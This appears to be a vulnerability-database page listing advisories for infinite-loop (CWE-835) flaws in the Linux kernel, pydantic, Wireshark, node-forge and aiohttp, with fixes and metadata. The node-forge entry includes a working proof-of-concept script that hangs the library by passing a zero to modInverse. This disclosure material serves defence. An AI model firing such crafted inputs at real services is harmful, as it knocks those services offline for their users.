CWE-835
AllowedLoop with Unreachable Exit Condition ('Infinite Loop')
Abstraction: Base · Status: Incomplete
The product contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop.
1059 vulnerabilities reference this CWE, most recent first.
GHSA-5J63-8Q43-CHWW
Vulnerability from github – Published: 2025-09-05 18:31 – Updated: 2026-07-14 15:31In the Linux kernel, the following vulnerability has been resolved:
netlink: avoid infinite retry looping in netlink_unicast()
netlink_attachskb() checks for the socket's read memory allocation constraints. Firstly, it has:
rmem < READ_ONCE(sk->sk_rcvbuf)
to check if the just increased rmem value fits into the socket's receive buffer. If not, it proceeds and tries to wait for the memory under:
rmem + skb->truesize > READ_ONCE(sk->sk_rcvbuf)
The checks don't cover the case when skb->truesize + sk->sk_rmem_alloc is equal to sk->sk_rcvbuf. Thus the function neither successfully accepts these conditions, nor manages to reschedule the task - and is called in retry loop for indefinite time which is caught as:
rcu: INFO: rcu_sched self-detected stall on CPU rcu: 0-....: (25999 ticks this GP) idle=ef2/1/0x4000000000000000 softirq=262269/262269 fqs=6212 (t=26000 jiffies g=230833 q=259957) NMI backtrace for cpu 0 CPU: 0 PID: 22 Comm: kauditd Not tainted 5.10.240 #68 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc42 04/01/2014 Call Trace: dump_stack lib/dump_stack.c:120 nmi_cpu_backtrace.cold lib/nmi_backtrace.c:105 nmi_trigger_cpumask_backtrace lib/nmi_backtrace.c:62 rcu_dump_cpu_stacks kernel/rcu/tree_stall.h:335 rcu_sched_clock_irq.cold kernel/rcu/tree.c:2590 update_process_times kernel/time/timer.c:1953 tick_sched_handle kernel/time/tick-sched.c:227 tick_sched_timer kernel/time/tick-sched.c:1399 __hrtimer_run_queues kernel/time/hrtimer.c:1652 hrtimer_interrupt kernel/time/hrtimer.c:1717 __sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1113 asm_call_irq_on_stack arch/x86/entry/entry_64.S:808
netlink_attachskb net/netlink/af_netlink.c:1234 netlink_unicast net/netlink/af_netlink.c:1349 kauditd_send_queue kernel/audit.c:776 kauditd_thread kernel/audit.c:897 kthread kernel/kthread.c:328 ret_from_fork arch/x86/entry/entry_64.S:304
Restore the original behavior of the check which commit in Fixes accidentally missed when restructuring the code.
Found by Linux Verification Center (linuxtesting.org).
{
"affected": [],
"aliases": [
"CVE-2025-38727"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-04T16:15:42Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetlink: avoid infinite retry looping in netlink_unicast()\n\nnetlink_attachskb() checks for the socket\u0027s read memory allocation\nconstraints. Firstly, it has:\n\n rmem \u003c READ_ONCE(sk-\u003esk_rcvbuf)\n\nto check if the just increased rmem value fits into the socket\u0027s receive\nbuffer. If not, it proceeds and tries to wait for the memory under:\n\n rmem + skb-\u003etruesize \u003e READ_ONCE(sk-\u003esk_rcvbuf)\n\nThe checks don\u0027t cover the case when skb-\u003etruesize + sk-\u003esk_rmem_alloc is\nequal to sk-\u003esk_rcvbuf. Thus the function neither successfully accepts\nthese conditions, nor manages to reschedule the task - and is called in\nretry loop for indefinite time which is caught as:\n\n rcu: INFO: rcu_sched self-detected stall on CPU\n rcu: 0-....: (25999 ticks this GP) idle=ef2/1/0x4000000000000000 softirq=262269/262269 fqs=6212\n (t=26000 jiffies g=230833 q=259957)\n NMI backtrace for cpu 0\n CPU: 0 PID: 22 Comm: kauditd Not tainted 5.10.240 #68\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc42 04/01/2014\n Call Trace:\n \u003cIRQ\u003e\n dump_stack lib/dump_stack.c:120\n nmi_cpu_backtrace.cold lib/nmi_backtrace.c:105\n nmi_trigger_cpumask_backtrace lib/nmi_backtrace.c:62\n rcu_dump_cpu_stacks kernel/rcu/tree_stall.h:335\n rcu_sched_clock_irq.cold kernel/rcu/tree.c:2590\n update_process_times kernel/time/timer.c:1953\n tick_sched_handle kernel/time/tick-sched.c:227\n tick_sched_timer kernel/time/tick-sched.c:1399\n __hrtimer_run_queues kernel/time/hrtimer.c:1652\n hrtimer_interrupt kernel/time/hrtimer.c:1717\n __sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1113\n asm_call_irq_on_stack arch/x86/entry/entry_64.S:808\n \u003c/IRQ\u003e\n\n netlink_attachskb net/netlink/af_netlink.c:1234\n netlink_unicast net/netlink/af_netlink.c:1349\n kauditd_send_queue kernel/audit.c:776\n kauditd_thread kernel/audit.c:897\n kthread kernel/kthread.c:328\n ret_from_fork arch/x86/entry/entry_64.S:304\n\nRestore the original behavior of the check which commit in Fixes\naccidentally missed when restructuring the code.\n\nFound by Linux Verification Center (linuxtesting.org).",
"id": "GHSA-5j63-8q43-chww",
"modified": "2026-07-14T15:31:27Z",
"published": "2025-09-05T18:31:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38727"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-019113.html"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/346c820ef5135cf062fa3473da955ef8c5fb6929"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/44ddd7b1ae0b7edb2c832eb16798c827a05e58f0"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/47d49fd07f86d1f55ea1083287303d237e9e0922"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/6bee383ff83352a693d03efdf27cdd80742f71b2"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/759dfc7d04bab1b0b86113f1164dc1fec192b859"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/78fcd69d55c5f11d7694c547eca767a1cfd38ec4"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/d42b71a34f6b8a2d5c53df81169b03b8d8b5cf4e"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/e8edc7de688791a337c068693f22e8d8b869df71"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/f324959ad47e62e3cadaffa65d3cff790fb48529"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00007.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00008.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-5JQP-QGF6-3PVH
Vulnerability from github – Published: 2021-05-13 20:23 – Updated: 2026-06-09 13:01Impact
Passing either 'infinity', 'inf' or float('inf') (or their negatives) to datetime or date fields causes validation to run forever with 100% CPU usage (on one CPU). Patches
Pydantic is be patched with fixes available in the following versions:
v1.8.2
v1.7.4
v1.6.2
All these versions are available on pypi, and will be available on conda-forge soon.
See the changelog for details. Workarounds
If you absolutely can't upgrade, you can work around this risk using a validator to catch these values, brief demo:
from datetime import date from pydantic import BaseModel, validator
class DemoModel(BaseModel): date_of_birth: date
@validator('date_of_birth', pre=True)
def skip_infinite_values(cls, v):
try:
seconds = float(v)
except (ValueError, TypeError):
return v
else:
if seconds == float('inf'):
return date.max
elif seconds == float('-inf'):
return date.min
else:
return seconds
Note: this is not an ideal solution (in particular you'll need a slightly different function for datetimes), instead of a hack like this you should upgrade pydantic.
If you are not using v1.8.x, v1.7.x or v1.6.x and are unable to upgrade to a fixed version of pydantic, please create an issue requesting a back-port, and we will endeavour to release a patch for earlier versions of pydantic. References
This was fixed in commit 7e83fdd.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "pydantic"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "pydantic"
},
"ranges": [
{
"events": [
{
"introduced": "1.8"
},
{
"fixed": "1.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "pydantic"
},
"ranges": [
{
"events": [
{
"introduced": "1.7"
},
{
"fixed": "1.7.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-29510"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-13T18:54:35Z",
"nvd_published_at": "2021-05-13T19:15:00Z",
"severity": "MODERATE"
},
"details": "Impact\n\nPassing either \u0027infinity\u0027, \u0027inf\u0027 or float(\u0027inf\u0027) (or their negatives) to datetime or date fields causes validation to run forever with 100% CPU usage (on one CPU).\nPatches\n\nPydantic is be patched with fixes available in the following versions:\n\n v1.8.2\n v1.7.4\n v1.6.2\n\nAll these versions are available on pypi, and will be available on conda-forge soon.\n\nSee the changelog for details.\nWorkarounds\n\nIf you absolutely can\u0027t upgrade, you can work around this risk using a validator to catch these values, brief demo:\n\nfrom datetime import date\nfrom pydantic import BaseModel, validator\n\nclass DemoModel(BaseModel):\n date_of_birth: date\n\n @validator(\u0027date_of_birth\u0027, pre=True)\n def skip_infinite_values(cls, v):\n try:\n seconds = float(v)\n except (ValueError, TypeError):\n return v\n else:\n if seconds == float(\u0027inf\u0027):\n return date.max\n elif seconds == float(\u0027-inf\u0027):\n return date.min\n else:\n return seconds\n\nNote: this is not an ideal solution (in particular you\u0027ll need a slightly different function for datetimes), instead of a hack like this you should upgrade pydantic.\n\nIf you are not using v1.8.x, v1.7.x or v1.6.x and are unable to upgrade to a fixed version of pydantic, please create an issue requesting a back-port, and we will endeavour to release a patch for earlier versions of pydantic.\nReferences\n\nThis was fixed in commit 7e83fdd.",
"id": "GHSA-5jqp-qgf6-3pvh",
"modified": "2026-06-09T13:01:00Z",
"published": "2021-05-13T20:23:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/samuelcolvin/pydantic/security/advisories/GHSA-5jqp-qgf6-3pvh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29510"
},
{
"type": "WEB",
"url": "https://github.com/pydantic/pydantic/commit/1c24f1d74ba95ea985b50bdc001ce96c813229aa"
},
{
"type": "WEB",
"url": "https://github.com/pydantic/pydantic/commit/80e0dd3f752bef145dce12f160d262bb40ec8d47"
},
{
"type": "WEB",
"url": "https://github.com/pydantic/pydantic/commit/bdde15b7b947c94ca00fd6eb92da8db390a13520"
},
{
"type": "WEB",
"url": "https://github.com/samuelcolvin/pydantic/commit/7e83fdd2563ffac081db7ecdf1affa65ef38c468"
},
{
"type": "PACKAGE",
"url": "https://github.com/pydantic/pydantic"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pydantic/PYSEC-2021-47.yaml"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S2HT266L6Q7H6ICP7DFGXOGBJHNNKMKB"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UEFWM7DYKD2ZHE7R5YT5EQWJPV4ZKYRB"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UMKAJX4O6IGBBCE32CO2G7PZQCCQSBLV"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Use of \"infinity\" as an input to datetime and date fields causes infinite loop in pydantic"
}
GHSA-5M6G-CJGH-P8QJ
Vulnerability from github – Published: 2022-05-13 01:47 – Updated: 2025-04-20 03:38In Wireshark 2.2.0 to 2.2.6 and 2.0.0 to 2.0.12, the DICOM dissector has an infinite loop. This was addressed in epan/dissectors/packet-dcm.c by validating a length value.
{
"affected": [],
"aliases": [
"CVE-2017-9349"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-06-02T05:29:00Z",
"severity": "HIGH"
},
"details": "In Wireshark 2.2.0 to 2.2.6 and 2.0.0 to 2.0.12, the DICOM dissector has an infinite loop. This was addressed in epan/dissectors/packet-dcm.c by validating a length value.",
"id": "GHSA-5m6g-cjgh-p8qj",
"modified": "2025-04-20T03:38:24Z",
"published": "2022-05-13T01:47:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-9349"
},
{
"type": "WEB",
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1329"
},
{
"type": "WEB",
"url": "https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13685"
},
{
"type": "WEB",
"url": "https://code.wireshark.org/review/gitweb?p=wireshark.git%3Ba=commit%3Bh=cb1b6494c44c9e939d9e2554de6b812de395e3f9"
},
{
"type": "WEB",
"url": "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=cb1b6494c44c9e939d9e2554de6b812de395e3f9"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00031.html"
},
{
"type": "WEB",
"url": "https://www.wireshark.org/security/wnpa-sec-2017-27.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/98803"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1038612"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-5M6Q-G25R-MVWX
Vulnerability from github – Published: 2026-03-26 21:57 – Updated: 2026-03-27 21:50Summary
A Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU. Affected Package
Package name: node-forge (npm: node-forge) Repository: https://github.com/digitalbazaar/forge Affected versions: All versions (including latest) Affected file: lib/jsbn.js, function bnModInverse() Root cause component: Bundled copy of the jsbn (JavaScript Big Number) library
Vulnerability Details
Type: Denial of Service (DoS) CWE: CWE-835 (Loop with Unreachable Exit Condition) Attack vector: Network (if the application processes untrusted input that reaches modInverse) Privileges required: None User interaction: None Impact: Availability (process hangs indefinitely) Suggested CVSS v3.1 score: 5.3–7.5 (depending on the context of usage)
Root Cause Analysis
The BigInteger.prototype.modInverse(m) function in lib/jsbn.js implements the Extended Euclidean Algorithm to compute the modular multiplicative inverse of this modulo m. Mathematically, the modular inverse of 0 does not exist — gcd(0, m) = m ≠ 1 for any m > 1. However, the implementation does not check whether the input value is zero before entering the algorithm's main loop. When this equals 0, the algorithm's loop condition is never satisfied for termination, resulting in an infinite loop. The relevant code path in lib/jsbn.js:
javascriptfunction bnModInverse(m) {
// ... setup ...
// No check for this == 0
// Enters Extended Euclidean Algorithm loop that never terminates when this == 0
}
Attack Scenario
Any application using node-forge that passes attacker-controlled or untrusted input to a code path involving modInverse() is vulnerable. Potential attack surfaces include:
DSA/ECDSA signature verification — A crafted signature with s = 0 would trigger s.modInverse(q), causing the verifier to hang. Custom RSA or Diffie-Hellman implementations — Applications performing modular arithmetic with user-supplied parameters. Any cryptographic protocol where an attacker can influence a value that is subsequently passed to modInverse().
A single malicious request can cause the Node.js event loop to block indefinitely, rendering the entire application unresponsive.
Proof of Concept
Environment Setup
mkdir forge-poc && cd forge-poc
npm init -y
npm install node-forge
Reproduction (poc.js) A single script that safely detects the vulnerability using a child process with timeout. The parent process is never at risk of hanging.
mkdir forge-poc && cd forge-poc
npm init -y
npm install node-forge
# Save the script below as poc.js, then run:
node poc.js
'use strict';
const { spawnSync } = require('child_process');
const childCode = `
const forge = require('node-forge');
// jsbn may not be auto-loaded; try explicit require if needed
if (!forge.jsbn) {
try { require('node-forge/lib/jsbn'); } catch(e) {}
}
if (!forge.jsbn || !forge.jsbn.BigInteger) {
console.error('ERROR: forge.jsbn.BigInteger not available');
process.exit(2);
}
const BigInteger = forge.jsbn.BigInteger;
const zero = new BigInteger('0', 10);
const mod = new BigInteger('3', 10);
// This call should throw or return 0, but instead loops forever
const inv = zero.modInverse(mod);
console.log('returned: ' + inv.toString());
`;
console.log('[*] Testing: BigInteger(0).modInverse(3)');
console.log('[*] Expected: throw an error or return quickly');
console.log('[*] Spawning child process with 5s timeout...');
console.log();
const result = spawnSync(process.execPath, ['-e', childCode], {
encoding: 'utf8',
timeout: 5000,
});
if (result.error && result.error.code === 'ETIMEDOUT') {
console.log('[VULNERABLE] Child process timed out after 5s');
console.log(' -> modInverse(0, 3) entered an infinite loop (DoS confirmed)');
process.exit(0);
}
if (result.status === 2) {
console.log('[ERROR] Could not access BigInteger:', result.stderr.trim());
console.log(' -> Check your node-forge installation');
process.exit(1);
}
if (result.status === 0) {
console.log('[NOT VULNERABLE] modInverse returned:', result.stdout.trim());
process.exit(1);
}
console.log('[NOT VULNERABLE] Child exited with error (status ' + result.status + ')');
if (result.stderr) console.log(' stderr:', result.stderr.trim());
process.exit(1);
Expected Output
[*] Testing: BigInteger(0).modInverse(3)
[*] Expected: throw an error or return quickly
[*] Spawning child process with 5s timeout...
[VULNERABLE] Child process timed out after 5s
-> modInverse(0, 3) entered an infinite loop (DoS confirmed)
Verified On
node-forge v1.3.1 (latest at time of writing) Node.js v18.x / v20.x / v22.x macOS / Linux / Windows
Impact
Availability: An attacker can cause a complete Denial of Service by sending a single crafted input that reaches the modInverse() code path. The Node.js process will hang indefinitely, blocking the event loop and making the application unresponsive to all subsequent requests. Scope: node-forge is a widely used cryptographic library with millions of weekly downloads on npm. Any application that processes untrusted cryptographic parameters through node-forge may be affected.
Suggested Fix
Add a zero-value check at the entry of bnModInverse() in lib/jsbn.js:
function bnModInverse(m) {
var ac = m.isEven();
// Add this check:
if (this.signum() == 0) {
throw new Error('BigInteger has no modular inverse: input is zero');
}
// ... rest of the existing implementation ...
}
Alternatively, return BigInteger.ZERO if that behavior is preferred, though throwing an error is more mathematically correct and consistent with other BigInteger implementations (e.g., Java's BigInteger.modInverse() throws ArithmeticException).
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "node-forge"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33891"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T21:57:48Z",
"nvd_published_at": "2026-03-27T21:17:25Z",
"severity": "HIGH"
},
"details": "## Summary\n\nA Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU.\nAffected Package\n\nPackage name: node-forge (npm: node-forge)\nRepository: https://github.com/digitalbazaar/forge\nAffected versions: All versions (including latest)\nAffected file: lib/jsbn.js, function bnModInverse()\nRoot cause component: Bundled copy of the jsbn (JavaScript Big Number) library\n\n## Vulnerability Details\n\nType: Denial of Service (DoS)\nCWE: CWE-835 (Loop with Unreachable Exit Condition)\nAttack vector: Network (if the application processes untrusted input that reaches modInverse)\nPrivileges required: None\nUser interaction: None\nImpact: Availability (process hangs indefinitely)\nSuggested CVSS v3.1 score: 5.3\u20137.5 (depending on the context of usage)\n\n## Root Cause Analysis\n\nThe BigInteger.prototype.modInverse(m) function in lib/jsbn.js implements the Extended Euclidean Algorithm to compute the modular multiplicative inverse of this modulo m.\nMathematically, the modular inverse of 0 does not exist \u2014 gcd(0, m) = m \u2260 1 for any m \u003e 1. However, the implementation does not check whether the input value is zero before entering the algorithm\u0027s main loop. When this equals 0, the algorithm\u0027s loop condition is never satisfied for termination, resulting in an infinite loop.\nThe relevant code path in lib/jsbn.js:\n```js\njavascriptfunction bnModInverse(m) {\n // ... setup ...\n // No check for this == 0\n // Enters Extended Euclidean Algorithm loop that never terminates when this == 0\n}\n```\n\n## Attack Scenario\n\nAny application using node-forge that passes attacker-controlled or untrusted input to a code path involving modInverse() is vulnerable. Potential attack surfaces include:\n\nDSA/ECDSA signature verification \u2014 A crafted signature with s = 0 would trigger s.modInverse(q), causing the verifier to hang.\nCustom RSA or Diffie-Hellman implementations \u2014 Applications performing modular arithmetic with user-supplied parameters.\nAny cryptographic protocol where an attacker can influence a value that is subsequently passed to modInverse().\n\nA single malicious request can cause the Node.js event loop to block indefinitely, rendering the entire application unresponsive.\n\n## Proof of Concept\n\nEnvironment Setup\n```bash\nmkdir forge-poc \u0026\u0026 cd forge-poc\nnpm init -y\nnpm install node-forge\n```\nReproduction (poc.js)\nA single script that safely detects the vulnerability using a child process with timeout. The parent process is never at risk of hanging.\n```bash\nmkdir forge-poc \u0026\u0026 cd forge-poc\nnpm init -y\nnpm install node-forge\n# Save the script below as poc.js, then run:\nnode poc.js\n```\n```javascript\n\u0027use strict\u0027;\nconst { spawnSync } = require(\u0027child_process\u0027);\n\nconst childCode = `\n const forge = require(\u0027node-forge\u0027);\n // jsbn may not be auto-loaded; try explicit require if needed\n if (!forge.jsbn) {\n try { require(\u0027node-forge/lib/jsbn\u0027); } catch(e) {}\n }\n if (!forge.jsbn || !forge.jsbn.BigInteger) {\n console.error(\u0027ERROR: forge.jsbn.BigInteger not available\u0027);\n process.exit(2);\n }\n const BigInteger = forge.jsbn.BigInteger;\n const zero = new BigInteger(\u00270\u0027, 10);\n const mod = new BigInteger(\u00273\u0027, 10);\n // This call should throw or return 0, but instead loops forever\n const inv = zero.modInverse(mod);\n console.log(\u0027returned: \u0027 + inv.toString());\n`;\n\nconsole.log(\u0027[*] Testing: BigInteger(0).modInverse(3)\u0027);\nconsole.log(\u0027[*] Expected: throw an error or return quickly\u0027);\nconsole.log(\u0027[*] Spawning child process with 5s timeout...\u0027);\nconsole.log();\n\nconst result = spawnSync(process.execPath, [\u0027-e\u0027, childCode], {\n encoding: \u0027utf8\u0027,\n timeout: 5000,\n});\n\nif (result.error \u0026\u0026 result.error.code === \u0027ETIMEDOUT\u0027) {\n console.log(\u0027[VULNERABLE] Child process timed out after 5s\u0027);\n console.log(\u0027 -\u003e modInverse(0, 3) entered an infinite loop (DoS confirmed)\u0027);\n process.exit(0);\n}\n\nif (result.status === 2) {\n console.log(\u0027[ERROR] Could not access BigInteger:\u0027, result.stderr.trim());\n console.log(\u0027 -\u003e Check your node-forge installation\u0027);\n process.exit(1);\n}\n\nif (result.status === 0) {\n console.log(\u0027[NOT VULNERABLE] modInverse returned:\u0027, result.stdout.trim());\n process.exit(1);\n}\n\nconsole.log(\u0027[NOT VULNERABLE] Child exited with error (status \u0027 + result.status + \u0027)\u0027);\nif (result.stderr) console.log(\u0027 stderr:\u0027, result.stderr.trim());\nprocess.exit(1);\n```\nExpected Output\n```\n[*] Testing: BigInteger(0).modInverse(3)\n[*] Expected: throw an error or return quickly\n[*] Spawning child process with 5s timeout...\n\n[VULNERABLE] Child process timed out after 5s\n -\u003e modInverse(0, 3) entered an infinite loop (DoS confirmed)\nVerified On\n```\n\nnode-forge v1.3.1 (latest at time of writing)\nNode.js v18.x / v20.x / v22.x\nmacOS / Linux / Windows\n\n## Impact\n\nAvailability: An attacker can cause a complete Denial of Service by sending a single crafted input that reaches the modInverse() code path. The Node.js process will hang indefinitely, blocking the event loop and making the application unresponsive to all subsequent requests.\nScope: node-forge is a widely used cryptographic library with millions of weekly downloads on npm. Any application that processes untrusted cryptographic parameters through node-forge may be affected.\n\n## Suggested Fix\n\nAdd a zero-value check at the entry of bnModInverse() in lib/jsbn.js:\n```javascript\nfunction bnModInverse(m) {\n var ac = m.isEven();\n // Add this check:\n if (this.signum() == 0) {\n throw new Error(\u0027BigInteger has no modular inverse: input is zero\u0027);\n }\n // ... rest of the existing implementation ...\n}\n```\nAlternatively, return BigInteger.ZERO if that behavior is preferred, though throwing an error is more mathematically correct and consistent with other BigInteger implementations (e.g., Java\u0027s BigInteger.modInverse() throws ArithmeticException).",
"id": "GHSA-5m6q-g25r-mvwx",
"modified": "2026-03-27T21:50:24Z",
"published": "2026-03-26T21:57:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33891"
},
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023"
},
{
"type": "PACKAGE",
"url": "https://github.com/digitalbazaar/forge"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input"
}
GHSA-5M98-QGG9-WH84
Vulnerability from github – Published: 2024-05-03 17:29 – Updated: 2025-11-03 22:46Summary
An attacker can send a specially crafted POST (multipart/form-data) request. When the aiohttp server processes it, the server will enter an infinite loop and be unable to process any further requests.
Impact
An attacker can stop the application from serving requests after sending a single request.
For anyone needing to patch older versions of aiohttp, the minimum diff needed to resolve the issue is (located in _read_chunk_from_length()):
diff --git a/aiohttp/multipart.py b/aiohttp/multipart.py
index 227be605c..71fc2654a 100644
--- a/aiohttp/multipart.py
+++ b/aiohttp/multipart.py
@@ -338,6 +338,8 @@ class BodyPartReader:
assert self._length is not None, "Content-Length required for chunked read"
chunk_size = min(size, self._length - self._read_bytes)
chunk = await self._content.read(chunk_size)
+ if self._content.at_eof():
+ self._at_eof = True
return chunk
async def _read_chunk_from_stream(self, size: int) -> bytes:
This does however introduce some very minor issues with handling form data. So, if possible, it would be recommended to also backport the changes in: https://github.com/aio-libs/aiohttp/commit/cebe526b9c34dc3a3da9140409db63014bc4cf19 https://github.com/aio-libs/aiohttp/commit/7eecdff163ccf029fbb1ddc9de4169d4aaeb6597 https://github.com/aio-libs/aiohttp/commit/f21c6f2ca512a026ce7f0f6c6311f62d6a638866
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.9.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-30251"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2024-05-03T17:29:54Z",
"nvd_published_at": "2024-05-02T14:15:09Z",
"severity": "HIGH"
},
"details": "### Summary\nAn attacker can send a specially crafted POST (multipart/form-data) request. When the aiohttp server processes it, the server will enter an infinite loop and be unable to process any further requests.\n\n### Impact\nAn attacker can stop the application from serving requests after sending a single request.\n\n-------\n\nFor anyone needing to patch older versions of aiohttp, the minimum diff needed to resolve the issue is (located in `_read_chunk_from_length()`):\n\n```diff\ndiff --git a/aiohttp/multipart.py b/aiohttp/multipart.py\nindex 227be605c..71fc2654a 100644\n--- a/aiohttp/multipart.py\n+++ b/aiohttp/multipart.py\n@@ -338,6 +338,8 @@ class BodyPartReader:\n assert self._length is not None, \"Content-Length required for chunked read\"\n chunk_size = min(size, self._length - self._read_bytes)\n chunk = await self._content.read(chunk_size)\n+ if self._content.at_eof():\n+ self._at_eof = True\n return chunk\n \n async def _read_chunk_from_stream(self, size: int) -\u003e bytes:\n```\n\nThis does however introduce some very minor issues with handling form data. So, if possible, it would be recommended to also backport the changes in:\nhttps://github.com/aio-libs/aiohttp/commit/cebe526b9c34dc3a3da9140409db63014bc4cf19\nhttps://github.com/aio-libs/aiohttp/commit/7eecdff163ccf029fbb1ddc9de4169d4aaeb6597\nhttps://github.com/aio-libs/aiohttp/commit/f21c6f2ca512a026ce7f0f6c6311f62d6a638866",
"id": "GHSA-5m98-qgg9-wh84",
"modified": "2025-11-03T22:46:13Z",
"published": "2024-05-03T17:29:54Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5m98-qgg9-wh84"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30251"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/7eecdff163ccf029fbb1ddc9de4169d4aaeb6597"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/cebe526b9c34dc3a3da9140409db63014bc4cf19"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/f21c6f2ca512a026ce7f0f6c6311f62d6a638866"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00002.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2024/05/02/4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "aiohttp vulnerable to Denial of Service when trying to parse malformed POST requests"
}
GHSA-5MF7-26MW-3RQR
